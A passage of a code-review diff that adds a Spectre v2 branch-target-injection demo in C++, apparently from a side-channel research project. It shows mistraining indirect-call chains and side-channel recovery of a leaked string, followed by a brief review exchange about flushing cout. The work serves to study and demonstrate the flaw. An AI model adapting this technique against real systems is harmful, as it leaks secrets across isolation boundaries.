demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+      // ICC generates cycles of length 8. First three are movs that have 2
+      // bytes (al, dl, cl), last five are movs that have 3 bytes (sil, r8b,
+      // r9b, r10b, r11b). On IA32 it behaves the same way as G++.
+      first_ptr += 2 + static_cast<bool>(i % 8 > 2);
+      second_ptr += 2 + static_cast<bool>(i % 8 > 2);
+#  elif SAFESIDE_GNUC || SAFESIDE_MSVC
+      // G++, MSVC and 32-bit ICC use movzbl to eax and that has 3 bytes.
+      first_ptr += 3;
+      second_ptr += 3;
+#  else
+#    error Unsupported compiler.
+#  endif
+#elif SAFESIDE_ARM64 || SAFESIDE_PPC
+      // ARM and PowerPC instructions have always 4 bytes.
+      dummy_ptr += 4;
+      first_ptr += 4;
+      second_ptr += 4;
+#else
+#  error Unsupported architecture.
+#endif
+
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+      void (*first_real_reader)(const void *) =
+          reinterpret_cast<void (*)(const void *)>(first_ptr);
+      void (*second_real_reader)(const void *) =
+          reinterpret_cast<void (*)(const void *)>(second_ptr);
+      *dummy_reader =
+          reinterpret_cast<void (*)(const void *)>(dummy_ptr);
+#elif SAFESIDE_IA32
+      void (SAFESIDE_FASTCALL *first_real_reader)(const void *) =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              first_ptr);
+      void (SAFESIDE_FASTCALL *second_real_reader)(const void *) =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              second_ptr);
+      *dummy_reader =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              dummy_ptr);
+#else
+#  error Unsupported architecture.
+#endif
+
+      // Inline 100 jumps to a real read from 100 different source addresses to
+      // the dynamic destination address (that has again 100 values).
+      SafeCalls<100>::generate(
+          second_real_reader, isolated_oracle.data() + static_cast<size_t>(
+              data[safe_offset]));
+
+      // Inline 100 jumps to the dummy read from 100 different source
+      // addresses to the dynamic destination address.
+      // Misjumps to actual reads in this section are pure injections, because
+      // architecturally those jumps lead always into the dummy reader full of
+      // nops.
+      DummyCalls<100>::generate(
+          dummy_reader.get(), isolated_oracle.data() + static_cast<size_t>(
+              data[offset]));
+
+      // Another 100 jumps to real reads.
+      SafeCalls<100>::generate(
+          first_real_reader, isolated_oracle.data() + static_cast<size_t>(
+              data[safe_offset]));
+    }
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(data[safe_offset]);
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cout << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+int main() {
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
```

Comment:
This is my own curiousity. Why do you have to flush cout here?

Reply:
Because /dev/stdout (in contrast with /dev/stderr) normally flushes only on linebreak or when it is full. So it would buffer leaked characters if we would not flush it explicitly.